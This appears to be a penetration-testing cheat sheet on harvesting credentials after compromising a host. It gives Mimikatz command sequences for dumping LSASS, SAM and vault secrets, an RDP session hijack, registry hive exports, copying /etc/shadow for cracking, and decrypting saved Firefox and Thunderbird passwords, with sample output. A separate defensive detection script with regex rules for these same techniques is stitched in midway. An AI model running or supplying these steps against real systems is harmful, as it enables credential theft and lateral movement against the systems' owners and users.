Get Credentials

After compromising a target, it is important to collect as many credentials as possible so they can be sprayed across the network.

Looking for Interesting Files

If the target runs a web application that uses a database, look for its config.php file to obtain the database connection credentials.

Check which applications are installed and look through their config files for new pairs of credentials.

Mimikatz

Dump all cached logon credentials, SAM, SYSTEM, LSASS, VAULT, etc.

.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords full
sekurlsa::wdigest
sekurlsa::credman
lsadump::sam
vault::cred
vault::list
ts::mstsc
ts::sessions

Or as a one-liner:

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords full" "sekurlsa::wdigest" "sekurlsa::credman" "lsadump::sam" "vault::cred" "vault::list" "ts::mstsc" "exit"

Note: if sekurlsa::logonpasswords does not work on Windows 10 or Server 2019, download an older release.

Hijacking RDP Session

To hijack an RDP session we need mimikatz; the /id value is the session ID listed by ts::sessions.

.\mimikatz.exe
privilege::debug
ts::sessions
ts::mstsc
token::elevate
ts::remote /id:3

SAM and SYSTEM (Win)

You can easily dump the SAM and SYSTEM registry hives from the command prompt. Just open cmd.exe as Administrator and run the following commands:

reg save HKLM\SAM c:\windows\temp\sam
reg save HKLM\SYSTEM c:\windows\temp\system

Finally, on our Kali machine we use samdump2 to extract the hashes.

samdump2 system sam > hashes.txt
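As an added example that is not part of these notes, here is a small Python rule set, run over constructed process-creation records, that flags the two techniques shown above: the reg save hive exports (the rule also covers the SECURITY hive) and mimikatz module commands. Hosts, users and command lines are made up.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 / Security 4688 style);
# hosts, users and command lines are made up, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\eric",
     "cmdline": "reg save HKLM\\SAM c:\\windows\\temp\\sam"},
    {"host": "ws01", "user": "CORP\\eric",
     "cmdline": "reg save HKLM\\SYSTEM c:\\windows\\temp\\system"},
    {"host": "ws01", "user": "CORP\\eric",
     "cmdline": 'mk.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"'},
    {"host": "ws02", "user": "CORP\\svc",
     "cmdline": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"},
    {"host": "ws02", "user": "CORP\\ana",
     "cmdline": "notepad.exe C:\\Users\\ana\\AppData\\Roaming\\Thunderbird\\profiles.ini"},
]

# Rules match on what the command does, not on the binary name: the notes above
# run mimikatz under its own name, but a renamed copy still issues the same commands.
RULES = [
    ("sam_or_system_hive_export",
     re.compile(r"\breg(\.exe)?\s+save\s+(\\\\)?hklm\\(sam|system|security)\b", re.I)),
    ("mimikatz_module_command",
     re.compile(r"\b(privilege::debug|sekurlsa::|lsadump::|token::elevate|vault::|ts::remote)",
                re.I)),
]

def detect(events):
    """Return (host, user, rule name, command line) for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                hits.append((ev["host"], ev["user"], name, ev["cmdline"]))
                break  # one alert per event; the analyst sees the full command line
    return hits

def hosts_with_both_hives(hits):
    """Hosts where SAM and SYSTEM were both exported. SAM alone cannot be decrypted
    without the boot key held in SYSTEM, so the pair is the stronger signal."""
    seen = {}
    for host, _user, name, cmdline in hits:
        if name == "sam_or_system_hive_export":
            hive = re.search(r"hklm\\(\w+)", cmdline, re.I).group(1).lower()
            seen.setdefault(host, set()).add(hive)
    return sorted(h for h, hives in seen.items() if {"sam", "system"} <= hives)

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS), hosts_with_both_hives(detect(SAMPLE_EVENTS)))
```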

PASSWD and SHADOW (Lin)

As on Windows, once we have compromised a privileged user such as root we can obtain the system users and their password hashes. On Linux we just need to copy the following files to our attacking machine.

/etc/passwd
/etc/shadow

Finally, on our Kali machine we use unshadow to combine them into a hash file:

unshadow passwd shadow > hashes.txt

Mozilla Firefox / Thunderbird / WaterFox / SeaMonkey

Some victims use Mozilla Firefox or Mozilla Thunderbird and store their saved credentials without a master password.

On Windows, look in the following path:

C:\Users\VICTIM\AppData\Roaming

Zip the content of the Firefox or Thunderbird folder and transfer it to the attacking machine. Once transferred, use the firefox_decrypt tool to get the plaintext credentials.

$ python firefox_decrypt.py /folder/containing/profiles.ini/

Master Password for profile /tmp/Thunderbird/Profiles/s68bba5j.default: 
2021-09-21 19:55:06,811 - WARNING - Attempting decryption with no Master Password

Website:   mailbox://test.local
Username: 'eric'
Password: 'sup3rs3cr3t'

Website:   smtp://test.local
Username: 'eric'
Password: 'sup3rs3cr3t'
Last updated 3 years ago
References

mimikatz.exe v 2.1.1
GitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profiles